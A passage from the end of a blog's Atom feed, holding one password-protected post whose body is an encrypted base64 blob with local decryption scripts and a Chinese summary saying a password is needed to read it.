ldPF61Yx9hE3/VMhObUPKsGI4kTw2ecobl69aiuhG9kKRI7mcFxGZSXxLWwm59pvUNnO62mNGOy9z4ROJnNFpiFg7+ma6SAgUlLXBo5tMJe3749ec096gyE3uz6HSqzJDsosMvqqk4H7sY4FoT5IYjwmIFNX3i1mjG2JbRrtV6U8cQcDgxmlnatz2mg5wUa4A9QjYz+eNMvp1crm0YKj7AIJfADugdyKoxl8/d0mblGkG1cSYbRZxfPTBbvOKE2Oj9ZJpGGyV+44UiJc6jBOvUstAGjRS9xLb2N7MVQpny9DRcjA6udQUIBuHRlzwHJNUEvYDs7LBT7Nc597BLnUo4m0DZWCOgIxQPTU7awUGbKWDAaXy3BHUapC/XqUd+GL/6TeOkD9jEcGj7DOHBEGzUmiQKVevG8rJBKw48/GorWdJ9gw0R8JWMCGQol41pDUqH0i6To8cM3HUx0Rdzou4o9y6mjUcdZ5FsjPg/aIBYmrsdONCtgtCI7XfpSDqyU4jbPv6zASRtD86c6RQsThrZDAM/tSeB7X/CB0ZXt6NpG9enV72IqrBogGQ8KocUdbosJ+wECEgOh+tdlMy2OJqbT6TYnLBLogIOC9Wi3w1pwsK0KGBBfAXccKjEgTMbLWcEoxG26AFO62WN2AATwX1/6og+adpZhI1dIY332L1P9Dd2bQ7EFcHJY4oMx8TDfGYp69MKWv/6LmY0aVDHgdhfJ4D1KSNaVwRI0X/Mre3Ho1CAz1bna1nUM7g+jIoGhp2Fo695SkdDmo0apmrYdUK+8zF+fFMxkITGINA3nmqAAra3XgailsKVLjRaabMXXWW3GwZhlxNAHkWTTbDxC9TKdTy1g/yqQLN2Xdl/UaaVxLUuE9aTAahjvBU0L9FXfue45EHlZJM6LQdJvwlK97Fmji1MosZhAGUaCFZeoKYYEq+uQ/tp/lAn+Pxd/C3j6AigBggHf2beAraGKfnlvzdVx+Ye0=</div><script src="/lib/crypto-js.js"></script><script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
    
    <summary type="html">
    
      此文章需要密码才能访问。
    
    </summary>
    
    
    
  </entry>
  
</feed>
